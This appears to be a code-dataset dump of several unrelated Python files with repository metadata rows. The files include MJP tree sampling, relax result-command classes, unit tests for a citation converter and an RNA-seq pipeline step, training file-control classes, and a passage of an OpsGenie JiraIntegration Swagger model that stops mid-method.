for _ in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
marks = student_marks[query_name]
total = 0
for i in marks:
total += i
res = total/len(marks)
print('%.2f' % res)
| [
"sayakalibek1@gmail.com"
] | sayakalibek1@gmail.com |
4a95586f5e04b017913bbc56e25ca916b195e870 | 9322c270beaf1019328bf14c836d167145d45946 | /raoteh/sampler/_sample_mjp.py | fdab6bbbe2bc9dda67fb576bd4a2b27627ccec95 | [] | no_license | argriffing/raoteh | 13d198665a7a3968aad8d41ddad12c08d36d57b4 | cdc9cce8fdad0a79dbd90dfcdec6feece8fc931f | refs/heads/master | 2021-01-22T19:41:25.828133 | 2014-03-10T22:25:48 | 2014-03-10T22:25:48 | 10,087,018 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,172 | py | """
Rao-Teh samples of MJP trajectories on trees.
"""
from __future__ import division, print_function, absolute_import
import numpy as np
import networkx as nx
from raoteh.sampler import _util, _mjp
__all__ = []
#TODO move more stuff from _sampler.py into this module
def resample_poisson(T, state_to_rate, root=None):
"""
Parameters
----------
T : weighted undirected acyclic networkx graph
Weighted tree whose edges are annotated with states.
In other words, this is an MJP trajectory.
state_to_rate : dict
Map the state to the expected number of poisson events
per edge weight.
root : integer, optional
Root of the tree.
Returns
-------
T_out : weighted undirected acyclic networkx graph
Weighted tree without state annotation.
"""
# If no root was specified then pick one arbitrarily.
if root is None:
root = _util.get_first_element(T)
# Define the next node.
next_node = max(T) + 1
# Build the list of weighted edges.
weighted_edges = []
for a, b in nx.bfs_edges(T, root):
weight = T[a][b]['weight']
state = T[a][b]['state']
rate = state_to_rate[state]
prev_node = a
total_dwell = 0.0
while True:
dwell = np.random.exponential(scale = 1/rate)
if total_dwell + dwell > weight:
break
total_dwell += dwell
mid_node = next_node
next_node += 1
weighted_edges.append((prev_node, mid_node, dwell))
prev_node = mid_node
weighted_edges.append((prev_node, b, weight - total_dwell))
# Return the resampled tree with poisson events on the edges.
T_out = nx.Graph()
T_out.add_weighted_edges_from(weighted_edges)
return T_out
def get_uniformized_transition_matrix(Q,
uniformization_factor=None, omega=None):
"""
Parameters
----------
Q : directed weighted networkx graph
Rate matrix.
uniformization_factor : float, optional
A value greater than 1.
omega : float, optional
The uniformization rate.
Returns
-------
P : directed weighted networkx graph
Transition probability matrix.
"""
if (uniformization_factor is not None) and (omega is not None):
raise ValueError('the uniformization factor and omega '
'should not both be provided')
# Compute the total rates.
total_rates = _mjp.get_total_rates(Q)
# Compute omega if necessary.
if omega is None:
if uniformization_factor is None:
uniformization_factor = 2
omega = uniformization_factor * max(total_rates.values())
# Construct a uniformized transition matrix from the rate matrix
# and the uniformization rate.
P = nx.DiGraph()
for a in Q:
if Q[a]:
weight = 1.0 - total_rates[a] / omega
P.add_edge(a, a, weight=weight)
for b in Q[a]:
weight = Q[a][b]['weight'] / omega
P.add_edge(a, b, weight=weight)
# Return the uniformized transition matrix.
return P
| [
"argriffi@ncsu.edu"
] | argriffi@ncsu.edu |
d214dc2ec55b92f64a7b41190073cca7608a26c1 | d9a22d4dcdfc0c28176c0e8afd784b30d275597e | /multi/result_commands.py | 714185c8a5cd3ed163af2c3f3d34ece8aa591eaa | [] | no_license | jlec/relax | fda1b3ff77be0afc21c2e6cc52348ae7635cd07a | c317326ddeacd1a1c608128769676899daeae531 | refs/heads/master | 2016-09-08T00:27:57.256090 | 2015-02-10T12:24:55 | 2015-02-10T12:24:55 | 30,596,131 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,870 | py | ###############################################################################
# #
# Copyright (C) 2007 Gary S Thompson (https://gna.org/users/varioustoxins) #
# Copyright (C) 2008-2013 Edward d'Auvergne #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# Module docstring.
"""Module containing command objects sent from the slaves back to the master."""
# Python module imports.
import sys
# multi module imports.
from multi.misc import Result
class Result_command(Result):
"""A general result command - designed to be subclassed by users.
This is a general result command from a Slave command that will have its run() method called on
return to the master processor.
@see: multi.processor.Slave_command.
"""
def __init__(self, processor, completed, memo_id=None):
#TODO: check this method is documnted by its parent
super(Result_command, self).__init__(processor=processor, completed=completed)
self.memo_id = memo_id
def run(self, processor, memo):
"""The run method of the result command.
This method will be called when the result command is processed by the master and should
carry out any actions the slave command needs carried out on the master (e.g. save or
register results).
@see: multi.processor.Processor.
@see: multi.processor.Slave_command.
@see: multi.memo.Memo.
@param processor: The master processor that queued the original Slave_command.
@type processor: Processor instance
@param memo: A memo that was registered when the original slave command was placed on
the queue. This provides local storage on the master.
@type memo: Memo instance or None
"""
pass
class Batched_result_command(Result_command):
def __init__(self, processor, result_commands, io_data=None, completed=True):
super(Batched_result_command, self).__init__(processor=processor, completed=completed)
self.result_commands = result_commands
# Store the IO data to print out via the run() method called by the master.
self.io_data = io_data
def run(self, processor, batched_memo):
"""The results command to be run by the master.
@param processor: The processor instance.
@type processor: Processor instance
@param batched_memo: The batched memo object.
@type batched_memo: Memo instance
"""
# First check that we are on the master.
processor.assert_on_master()
# Unravel the IO stream data on the master in the correct order.
for line, stream in self.io_data:
if stream == 0:
sys.stdout.write(line)
else:
sys.stderr.write(line)
if batched_memo != None:
msg = "batched result commands shouldn't have memo values, memo: " + repr(batched_memo)
if batched_memo != None:
msg = "batched result commands shouldn't have memo values, memo: " + repr(batched_memo)
raise ValueError(msg)
for result_command in self.result_commands:
processor.process_result(result_command)
class Null_result_command(Result_command):
"""An empty result command.
This command should be returned from slave_command if no other Result_command is returned. This
allows the queue processor to register that the slave processor has completed its processing and
schedule new Slave-commands to it.
"""
def __init__(self, processor, completed=True):
super(Null_result_command, self).__init__(processor=processor, completed=completed)
class Result_exception(Result_command):
"""Return and raise an exception from the salve processor."""
def __init__(self, processor, exception, completed=True):
"""Initialise the result command with an exception.
@param exception: An exception that was raised on the slave processor (note the real
exception will be wrapped in a Capturing_exception.
@type exception: Exception instance
"""
super(Result_exception, self).__init__(processor=processor, completed=completed)
self.exception = exception
def run(self, processor, memo):
"""Raise the exception from the Slave_processor."""
raise self.exception
| [
"bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5"
] | bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5 |
e8bcf51f6b4bea52914dcb421fdbe9d4c297c1e5 | 10b3d1ce02eaa4908dc16ca378ddfb1955b2d625 | /MV3D_TF_release/tests/private/test_save_pretrained_params_from_npy.py | eb62bf9b4a8afd458e9a0bb684262a62725bed00 | [
"MIT",
"BSD-3-Clause"
] | permissive | ZiningWang/Sparse_Pooling | 7281aa0d974849eac8c48faa5ba08519b091ef6e | f46882832d0e2fed5ab4a0af15cead44fd3c6faa | refs/heads/master | 2023-05-26T08:47:16.232822 | 2023-05-20T08:39:11 | 2023-05-20T08:39:11 | 141,640,800 | 56 | 21 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | #This is for transforming the .npy file saved in python2 to python3
import numpy as np
import os
import scipy.io
params = np.load('mscnn_ped_cyc_kitti_trainval_2nd_iter_15000.npy').item()
#make matlab file
scipy.io.savemat('mscnn_ped_cyc_kitti_trainval_2nd_iter_15000.mat',params)
''' #make txt files(failed)
os.mkdir('npy_params_csv')
for layer_name in params.keys():
layer = params[layer_name]
if type(layer) is dict:
os.mkdir(layer_name)
for layer_param_name in layer:
layer_param = layer[layer_param_name]
np.savetxt(layer_param_name+'.csv',layer_param)
else:
np.savetxt(layer_name+'.csv',layer)
'''
| [
"kiwoo.shin@berkeley.edu"
] | kiwoo.shin@berkeley.edu |
2dd1609af2025fa93e9fc6653d6d33aeb97f9b19 | 493431b109586bc199c0094bb6952b359c30777a | /t/step/test_header_step.py | 22289673b733113ef07729325bf5baffc937a5ad | [] | no_license | phonybone/Rnaseq | 3ec92ba79c6772ffb5ac146ee98dad87663f17e7 | c12d5380db2e36f24b6e5cb84c55a984efdd9cd7 | refs/heads/master | 2020-05-31T21:19:40.175543 | 2011-10-06T00:01:49 | 2011-10-06T00:01:49 | 1,409,030 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | import unittest, os, sys, re
dir=os.path.normpath(os.path.dirname(os.path.abspath(__file__))+"/../..")
sys.path.append(os.path.join(dir+'/lib'))
sys.path.append(os.path.join(dir+'/ext_libs'))
from Rnaseq import *
from RnaseqGlobals import *
from warn import *
class TestHeaderStep(unittest.TestCase):
def setUp(self):
argv=RnaseqGlobals.initialize(__file__, testing=True) # not to be confused with sys.argv
readset_file=RnaseqGlobals.root_dir()+'/t/fixtures/readsets/readset1.syml'
rlist=Readset.load(readset_file)
self.readset=rlist[0]
self.pipeline=Pipeline.get_pipeline(name='link', readset=self.readset).load_steps()
def test_setup(self):
self.assertEqual(self.readset.name, 'readset1.syml')
self.assertEqual(self.pipeline.name, 'link')
self.assertTrue(self.pipeline.context != None)
#def test_header_script(self):
#header_step=self.pipeline.step_with_name('header')
def test_readset_exports(self):
header_step=self.pipeline.step_with_name('header')
script=header_step.sh_script(self.pipeline.context)
for ex in self.readset.exports:
target='export %s=%s' % (ex, getattr(self.readset, ex))
self.assertRegexpMatches(script, target)
#print >>sys.stderr, "got %s" % target
def test_links(self):
header_step=self.pipeline.step_with_name('header')
script=header_step.sh_script(self.pipeline.context)
for rf in self.readset.reads_files:
target='ln -fs %s %s' % (rf, self.readset.working_dir)
self.assertRegexpMatches(script, target)
#print >>sys.stderr, "got %s" % target
suite = unittest.TestLoader().loadTestsFromTestCase(TestHeaderStep)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"vcassen@bento.systemsbiology.net"
] | vcassen@bento.systemsbiology.net |
d2239c158fa3aa78bbd5bf3e8a5cb23e8b68c2fc | bfe394e1b7d8a2ff34e37ae65df8cc52070c69d8 | /Source/External/TrainUtility/Source/TrainProcess_FileControl.py | 421e6bb0c5f2eb8f3175960b7bb6fcbe8f89070f | [
"MIT"
] | permissive | Jack-GVDL/PredictModel | bb32d37a5c18a656d5ebed36098ba3fac435fb96 | 20495072fb776c31c4bb5f2ddeecda1b43fcc52e | refs/heads/main | 2023-04-30T05:47:34.364328 | 2021-05-11T09:25:13 | 2021-05-11T09:25:13 | 366,314,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,936 | py | import os
from typing import *
from .TrainProcess import TrainProcess
from .ModelInfo import ModelInfo
from .FileControl import FileControl_Local
class TrainProcess_FileControlBuilder(TrainProcess):
def __init__(self):
super().__init__()
# data
self.name = "FileControlBuilder"
self.path_base: str = "" # this should exist
self.path_folder: str = "" # this should not exist
self.path_src: str = ""
# operation
# ...
def __del__(self):
return
# Operation
def setTargetPath(self, base: str, folder: str) -> None:
self.path_base = base
self.path_folder = folder
# operation
def execute(self, stage: int, info: ModelInfo, data: Dict) -> None:
# create the base directory
self.path_src = os.path.join(self.path_base, self.path_folder)
if not os.path.isdir(self.path_src):
os.mkdir(self.path_src)
# create file control
control = FileControl_Local()
control.setLocalRoot(self.path_src)
control.start()
info.file_control = control
# info
def getPrintContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
def getLogContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
# Protected
def _getContent_(self, info: ModelInfo) -> str:
return "Operation: " + self.name
class TrainProcess_FileControlUpdater(TrainProcess):
def __init__(self):
super().__init__()
# data
self.name = "FileControlUpdater"
# operation
# ...
def __del__(self):
return
# Property
# operation
def execute(self, stage: int, info: ModelInfo, data: Dict) -> None:
info.file_control.update()
# Operation
# ...
# Protected
def getPrintContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
def getLogContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
# Protected
def _getContent_(self, info: ModelInfo) -> str:
return "Operation: " + self.name
| [
"33114105+Jack-GVDL@users.noreply.github.com"
] | 33114105+Jack-GVDL@users.noreply.github.com |
08b3a3fbc165a4633691df1cd0579378c3fa8569 | a62fe37f8d633cbeb75d8cf2487f24e2bb0c13ce | /test/1.1.0/08/EndnoteObjectTest08.py | 73e2862f293a89600750726f5cfc582610fa3a47 | [
"Apache-2.0"
] | permissive | monperrus/cff-converter-python | ddf4e28329c48b0d3db4709de8765dfbfc94ad0b | b7b789a80415c6020e864782b601f21188a149f4 | refs/heads/master | 2020-11-27T10:40:11.447633 | 2019-12-19T15:58:01 | 2019-12-19T15:58:01 | 229,408,045 | 0 | 0 | Apache-2.0 | 2019-12-21T09:54:20 | 2019-12-21T09:54:19 | null | UTF-8 | Python | false | false | 1,468 | py | from cffconvert import EndnoteObject
import unittest
import os
import ruamel.yaml as yaml
class EndnoteObjectTest(unittest.TestCase):
def setUp(self):
fixture = os.path.join(os.path.dirname(__file__), "CITATION.cff")
with open(fixture, "r") as f:
cffstr = f.read()
cff_object = yaml.safe_load(cffstr)
self.eo = EndnoteObject(cff_object, initialize_empty=True)
def test_check_cff_object(self):
self.eo.check_cff_object()
# doesn't need an assert
def test_author(self):
self.eo.add_author()
self.assertEqual(self.eo.author, '%A Van Zandt, Steven\n%A van Zandt, Steven\n')
def test_doi(self):
self.eo.add_doi()
self.assertIsNone(self.eo.doi)
def test_keyword(self):
self.eo.add_keyword()
self.assertIsNone(self.eo.keyword)
def test_name(self):
self.eo.add_name()
self.assertEqual(self.eo.name, '%T cff-converter-python\n')
def test_print(self):
actual_endnote = self.eo.add_all().print()
fixture = os.path.join(os.path.dirname(__file__), "endnote.enw")
with open(fixture, "r") as f:
expected_endnote = f.read()
self.assertEqual(actual_endnote, expected_endnote)
def test_url(self):
self.eo.add_url()
self.assertIsNone(self.eo.url)
def test_year(self):
self.eo.add_year()
self.assertEqual(self.eo.year, '%D 2018\n')
| [
"j.spaaks@esciencecenter.nl"
] | j.spaaks@esciencecenter.nl |
e4be9d7b105b0171b203f3ab0a681d4997565d9d | c104dbd09a853725cb4f4b17df7c5dd59d47e04e | /opsgenie_swagger/models/jira_integration.py | 185f6418b77a71dfbe695e25f05cecc5a04a542c | [
"Apache-2.0"
] | permissive | bm-lab/opsgenie-python-sdk | 5a64e2c24f1b9168ecadf482ba8084ba27a659fc | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | refs/heads/master | 2021-10-09T03:18:48.101672 | 2018-12-15T01:03:36 | 2018-12-20T15:13:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,355 | py | # coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from opsgenie_swagger.models.action_mapping import ActionMapping # noqa: F401,E501
from opsgenie_swagger.models.alert_filter import AlertFilter # noqa: F401,E501
from opsgenie_swagger.models.integration import Integration # noqa: F401,E501
from opsgenie_swagger.models.jira_callback import JiraCallback # noqa: F401,E501
from opsgenie_swagger.models.recipient import Recipient # noqa: F401,E501
from opsgenie_swagger.models.team_meta import TeamMeta # noqa: F401,E501
from opsgenie_swagger.models.token_based_incoming_feature import TokenBasedIncomingFeature # noqa: F401,E501
class JiraIntegration(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'suppress_notifications': 'bool',
'ignore_teams_from_payload': 'bool',
'ignore_recipients_from_payload': 'bool',
'recipients': 'list[Recipient]',
'is_advanced': 'bool',
'feature_type': 'str',
'allow_configuration_access': 'bool',
'allow_write_access': 'bool',
'alert_filter': 'AlertFilter',
'forwarding_enabled': 'bool',
'forwarding_action_mappings': 'list[ActionMapping]',
'callback_type': 'str',
'updates_action_mappings': 'list[ActionMapping]',
'updates_enabled': 'bool',
'bidirectional_callback_type': 'str',
'jira_username': 'str',
'jira_password': 'str',
'jira_url': 'str',
'project_key': 'str',
'issue_type_name': 'str'
}
attribute_map = {
'suppress_notifications': 'suppressNotifications',
'ignore_teams_from_payload': 'ignoreTeamsFromPayload',
'ignore_recipients_from_payload': 'ignoreRecipientsFromPayload',
'recipients': 'recipients',
'is_advanced': 'isAdvanced',
'feature_type': 'feature-type',
'allow_configuration_access': 'allowConfigurationAccess',
'allow_write_access': 'allowWriteAccess',
'alert_filter': 'alertFilter',
'forwarding_enabled': 'forwardingEnabled',
'forwarding_action_mappings': 'forwardingActionMappings',
'callback_type': 'callback-type',
'updates_action_mappings': 'updatesActionMappings',
'updates_enabled': 'updatesEnabled',
'bidirectional_callback_type': 'bidirectional-callback-type',
'jira_username': 'jiraUsername',
'jira_password': 'jiraPassword',
'jira_url': 'jiraUrl',
'project_key': 'projectKey',
'issue_type_name': 'issueTypeName'
}
def __init__(self, suppress_notifications=None, ignore_teams_from_payload=None, ignore_recipients_from_payload=None, recipients=None, is_advanced=None, feature_type=None, allow_configuration_access=None, allow_write_access=None, alert_filter=None, forwarding_enabled=None, forwarding_action_mappings=None, callback_type=None, updates_action_mappings=None, updates_enabled=None, bidirectional_callback_type=None, jira_username=None, jira_password=None, jira_url=None, project_key=None, issue_type_name=None): # noqa: E501
"""JiraIntegration - a model defined in Swagger""" # noqa: E501
self._suppress_notifications = None
self._ignore_teams_from_payload = None
self._ignore_recipients_from_payload = None
self._recipients = None
self._is_advanced = None
self._feature_type = None
self._allow_configuration_access = None
self._allow_write_access = None
self._alert_filter = None
self._forwarding_enabled = None
self._forwarding_action_mappings = None
self._callback_type = None
self._updates_action_mappings = None
self._updates_enabled = None
self._bidirectional_callback_type = None
self._jira_username = None
self._jira_password = None
self._jira_url = None
self._project_key = None
self._issue_type_name = None
self.discriminator = None
if suppress_notifications is not None:
self.suppress_notifications = suppress_notifications
if ignore_teams_from_payload is not None:
self.ignore_teams_from_payload = ignore_teams_from_payload
if ignore_recipients_from_payload is not None:
self.ignore_recipients_from_payload = ignore_recipients_from_payload
if recipients is not None:
self.recipients = recipients
if is_advanced is not None:
self.is_advanced = is_advanced
if feature_type is not None:
self.feature_type = feature_type
if allow_configuration_access is not None:
self.allow_configuration_access = allow_configuration_access
if allow_write_access is not None:
self.allow_write_access = allow_write_access
if alert_filter is not None:
self.alert_filter = alert_filter
if forwarding_enabled is not None:
self.forwarding_enabled = forwarding_enabled
if forwarding_action_mappings is not None:
self.forwarding_action_mappings = forwarding_action_mappings
if callback_type is not None:
self.callback_type = callback_type
if updates_action_mappings is not None:
self.updates_action_mappings = updates_action_mappings
if updates_enabled is not None:
self.updates_enabled = updates_enabled
if bidirectional_callback_type is not None:
self.bidirectional_callback_type = bidirectional_callback_type
if jira_username is not None:
self.jira_username = jira_username
if jira_password is not None:
self.jira_password = jira_password
if jira_url is not None:
self.jira_url = jira_url
if project_key is not None:
self.project_key = project_key
if issue_type_name is not None:
self.issue_type_name = issue_type_name
@property
def suppress_notifications(self):
"""Gets the suppress_notifications of this JiraIntegration. # noqa: E501
If enabled, notifications that come from alerts will be suppressed. Defaults to false # noqa: E501
:return: The suppress_notifications of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._suppress_notifications
@suppress_notifications.setter
def suppress_notifications(self, suppress_notifications):
"""Sets the suppress_notifications of this JiraIntegration.
If enabled, notifications that come from alerts will be suppressed. Defaults to false # noqa: E501
:param suppress_notifications: The suppress_notifications of this JiraIntegration. # noqa: E501
:type: bool
"""
self._suppress_notifications = suppress_notifications
@property
def ignore_teams_from_payload(self):
"""Gets the ignore_teams_from_payload of this JiraIntegration. # noqa: E501
If enabled, the integration will ignore teams sent in request payloads. Defaults to false # noqa: E501
:return: The ignore_teams_from_payload of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._ignore_teams_from_payload
@ignore_teams_from_payload.setter
def ignore_teams_from_payload(self, ignore_teams_from_payload):
"""Sets the ignore_teams_from_payload of this JiraIntegration.
If enabled, the integration will ignore teams sent in request payloads. Defaults to false # noqa: E501
:param ignore_teams_from_payload: The ignore_teams_from_payload of this JiraIntegration. # noqa: E501
:type: bool
"""
self._ignore_teams_from_payload = ignore_teams_from_payload
@property
def ignore_recipients_from_payload(self):
"""Gets the ignore_recipients_from_payload of this JiraIntegration. # noqa: E501
If enabled, the integration will ignore recipients sent in request payloads. Defaults to false # noqa: E501
:return: The ignore_recipients_from_payload of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._ignore_recipients_from_payload
@ignore_recipients_from_payload.setter
def ignore_recipients_from_payload(self, ignore_recipients_from_payload):
"""Sets the ignore_recipients_from_payload of this JiraIntegration.
If enabled, the integration will ignore recipients sent in request payloads. Defaults to false # noqa: E501
:param ignore_recipients_from_payload: The ignore_recipients_from_payload of this JiraIntegration. # noqa: E501
:type: bool
"""
self._ignore_recipients_from_payload = ignore_recipients_from_payload
@property
def recipients(self):
"""Gets the recipients of this JiraIntegration. # noqa: E501
Optional user, schedule, teams or escalation names to calculate which users will receive the notifications of the alert. Recipients which are exceeding the limit are ignored # noqa: E501
:return: The recipients of this JiraIntegration. # noqa: E501
:rtype: list[Recipient]
"""
return self._recipients
@recipients.setter
def recipients(self, recipients):
"""Sets the recipients of this JiraIntegration.
Optional user, schedule, teams or escalation names to calculate which users will receive the notifications of the alert. Recipients which are exceeding the limit are ignored # noqa: E501
:param recipients: The recipients of this JiraIntegration. # noqa: E501
:type: list[Recipient]
"""
self._recipients = recipients
@property
def is_advanced(self):
"""Gets the is_advanced of this JiraIntegration. # noqa: E501
:return: The is_advanced of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._is_advanced
@is_advanced.setter
def is_advanced(self, is_advanced):
"""Sets the is_advanced of this JiraIntegration.
:param is_advanced: The is_advanced of this JiraIntegration. # noqa: E501
:type: bool
"""
self._is_advanced = is_advanced
@property
def feature_type(self):
"""Gets the feature_type of this JiraIntegration. # noqa: E501
:return: The feature_type of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._feature_type
@feature_type.setter
def feature_type(self, feature_type):
"""Sets the feature_type of this JiraIntegration.
:param feature_type: The feature_type of this JiraIntegration. # noqa: E501
:type: str
"""
allowed_values = ["email-based", "token-based"] # noqa: E501
if feature_type not in allowed_values:
raise ValueError(
"Invalid value for `feature_type` ({0}), must be one of {1}" # noqa: E501
.format(feature_type, allowed_values)
)
self._feature_type = feature_type
@property
def allow_configuration_access(self):
"""Gets the allow_configuration_access of this JiraIntegration. # noqa: E501
This parameter is for allowing or restricting the configuration access. If configuration access is restricted, the integration will be limited to Alert API requests and sending heartbeats. Defaults to false # noqa: E501
:return: The allow_configuration_access of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._allow_configuration_access
@allow_configuration_access.setter
def allow_configuration_access(self, allow_configuration_access):
"""Sets the allow_configuration_access of this JiraIntegration.
This parameter is for allowing or restricting the configuration access. If configuration access is restricted, the integration will be limited to Alert API requests and sending heartbeats. Defaults to false # noqa: E501
:param allow_configuration_access: The allow_configuration_access of this JiraIntegration. # noqa: E501
:type: bool
"""
self._allow_configuration_access = allow_configuration_access
@property
def allow_write_access(self):
"""Gets the allow_write_access of this JiraIntegration. # noqa: E501
This parameter is for configuring the read-only access of integration. If the integration is limited to read-only access, the integration will not be authorized to perform any create, update or delete action within any domain. Defaults to true # noqa: E501
:return: The allow_write_access of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._allow_write_access
@allow_write_access.setter
def allow_write_access(self, allow_write_access):
"""Sets the allow_write_access of this JiraIntegration.
This parameter is for configuring the read-only access of integration. If the integration is limited to read-only access, the integration will not be authorized to perform any create, update or delete action within any domain. Defaults to true # noqa: E501
:param allow_write_access: The allow_write_access of this JiraIntegration. # noqa: E501
:type: bool
"""
self._allow_write_access = allow_write_access
@property
def alert_filter(self):
"""Gets the alert_filter of this JiraIntegration. # noqa: E501
:return: The alert_filter of this JiraIntegration. # noqa: E501
:rtype: AlertFilter
"""
return self._alert_filter
@alert_filter.setter
def alert_filter(self, alert_filter):
"""Sets the alert_filter of this JiraIntegration.
:param alert_filter: The alert_filter of this JiraIntegration. # noqa: E501
:type: AlertFilter
"""
self._alert_filter = alert_filter
@property
def forwarding_enabled(self):
"""Gets the forwarding_enabled of this JiraIntegration. # noqa: E501
:return: The forwarding_enabled of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._forwarding_enabled
@forwarding_enabled.setter
def forwarding_enabled(self, forwarding_enabled):
"""Sets the forwarding_enabled of this JiraIntegration.
:param forwarding_enabled: The forwarding_enabled of this JiraIntegration. # noqa: E501
:type: bool
"""
self._forwarding_enabled = forwarding_enabled
@property
def forwarding_action_mappings(self):
"""Gets the forwarding_action_mappings of this JiraIntegration. # noqa: E501
:return: The forwarding_action_mappings of this JiraIntegration. # noqa: E501
:rtype: list[ActionMapping]
"""
return self._forwarding_action_mappings
@forwarding_action_mappings.setter
def forwarding_action_mappings(self, forwarding_action_mappings):
"""Sets the forwarding_action_mappings of this JiraIntegration.
:param forwarding_action_mappings: The forwarding_action_mappings of this JiraIntegration. # noqa: E501
:type: list[ActionMapping]
"""
self._forwarding_action_mappings = forwarding_action_mappings
@property
def callback_type(self):
"""Gets the callback_type of this JiraIntegration. # noqa: E501
:return: The callback_type of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._callback_type
@callback_type.setter
def callback_type(self, callback_type):
"""Sets the callback_type of this JiraIntegration.
:param callback_type: The callback_type of this JiraIntegration. # noqa: E501
:type: str
"""
allowed_values = ["bidirectional-callback-new", "amazon-sns-callback"] # noqa: E501
if callback_type not in allowed_values:
raise ValueError(
"Invalid value for `callback_type` ({0}), must be one of {1}" # noqa: E501
.format(callback_type, allowed_values)
)
self._callback_type = callback_type
@property
def updates_action_mappings(self):
"""Gets the updates_action_mappings of this JiraIntegration. # noqa: E501
:return: The updates_action_mappings of this JiraIntegration. # noqa: E501
:rtype: list[ActionMapping]
"""
return self._updates_action_mappings
@updates_action_mappings.setter
def updates_action_mappings(self, updates_action_mappings):
"""Sets the updates_action_mappings of this JiraIntegration.
:param updates_action_mappings: The updates_action_mappings of this JiraIntegration. # noqa: E501
:type: list[ActionMapping]
"""
self._updates_action_mappings = updates_action_mappings
@property
def updates_enabled(self):
"""Gets the updates_enabled of this JiraIntegration. # noqa: E501
:return: The updates_enabled of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._updates_enabled
@updates_enabled.setter
def updates_enabled(self, updates_enabled):
"""Sets the updates_enabled of this JiraIntegration.
:param updates_enabled: The updates_enabled of this JiraIntegration. # noqa: E501
:type: bool
"""
self._updates_enabled = updates_enabled
@property
def bidirectional_callback_type(self):
"""Gets the bidirectional_callback_type of this JiraIntegration. # noqa: E501
:return: The bidirectional_callback_type of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._bidirectional_callback_type
@bidirectional_callback_type.setter
def bidirectional_callback_type(self, bidirectional_callback_type):
"""Sets the bidirectional_callback_type of this JiraIntegration.
:param bidirectional_callback_type: The bidirectional_callback_type of this JiraIntegration. # noqa: E501
:type: str
"""
allowed_values = ["opsgenie-callback", "jira-callback", "jira-service-desk-callback", "service-now-callback", "kayako-callback", "ms-teams-callback", "op5-callback", "status-page-io-callback", "zendesk-callback"] # noqa: E501
if bidirectional_callback_type not in allowed_values:
raise ValueError(
"Invalid value for `bidirectional_callback_type` ({0}), must be one of {1}" # noqa: E501
.format(bidirectional_callback_type, allowed_values)
)
self._bidirectional_callback_type = bidirectional_callback_type
@property
def jira_username(self):
"""Gets the jira_username of this JiraIntegration. # noqa: E501
:return: The jira_username of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._jira_username
@jira_username.setter
def jira_username(self, jira_username):
"""Sets the jira_username of this JiraIntegration.
:param jira_username: The jira_username of this JiraIntegration. # noqa: E501
:type: str
"""
self._jira_username = jira_username
@property
def jira_password(self):
"""Gets the jira_password of this JiraIntegration. # noqa: E501
:return: The jira_password of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._jira_password
@jira_password.setter
def jira_password(self, jira_password):
"""Sets the jira_password of this JiraIntegration.
:param jira_password: The jira_password of this JiraIntegration. # noqa: E501
:type: str
"""
self._jira_password = jira_password
@property
def jira_url(self):
"""Gets the jira_url of this JiraIntegration. # noqa: E501
:return: The jira_url of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._jira_url
@jira_url.setter
def jira_url(self, jira_url):
"""Sets the jira_url of this JiraIntegration.
:param jira_url: The jira_url of this JiraIntegration. # noqa: E501
:type: str
"""
self._jira_url = jira_url
@property
def project_key(self):
"""Gets the project_key of this JiraIntegration. # noqa: E501
:return: The project_key of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._project_key
@project_key.setter
def project_key(self, project_key):
"""Sets the project_key of this JiraIntegration.
:param project_key: The project_key of this JiraIntegration. # noqa: E501
:type: str
"""
self._project_key = project_key
@property
def issue_type_name(self):
"""Gets the issue_type_name of this JiraIntegration. # noqa: E501
:return: The issue_type_name of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._issue_type_name
@issue_type_name.setter
def issue_type_name(self, issue_type_name):
"""Sets the issue_type_name of this JiraIntegration.
:param issue_type_name: The issue_type_name of this JiraIntegration. # noqa: E501
:type: str
"""
self._issue_type_name = issue_type_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
